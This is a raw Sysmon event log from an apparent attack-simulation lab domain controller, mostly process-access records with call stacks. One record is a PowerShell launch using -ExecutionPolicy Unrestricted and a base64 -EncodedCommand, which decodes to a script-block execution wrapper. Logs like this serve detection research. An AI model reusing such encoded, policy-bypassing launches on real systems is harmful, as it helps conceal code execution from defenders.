11:59:59.013{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-643F-6064-D202-00000000AD01}4608C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-643E-6064-D102-00000000AD01}16042728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-643F-6064-D202-00000000AD01}4608C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+94abc449|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f3f8d2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f3f50d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+94a0780b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93efc47f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f5fef1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f41f00|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f41f00|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f41d91|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f32ab1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f3fff3|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f3fbc0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f3f8d2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f3f50d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+94a0780b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f247b8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f23d2a 154100x8000000000000000417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.015{266CAFBE-643F-6064-D202-00000000AD01}4608C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-643E-6064-F4EC-110000000000}0x11ecf40HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.638{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-6440-6064-D602-00000000AD01}12965004C:\Windows\system32\conhost.exe{266CAFBE-6440-6064-DA02-00000000AD01}4644C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6440-6064-DA02-00000000AD01}4644C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 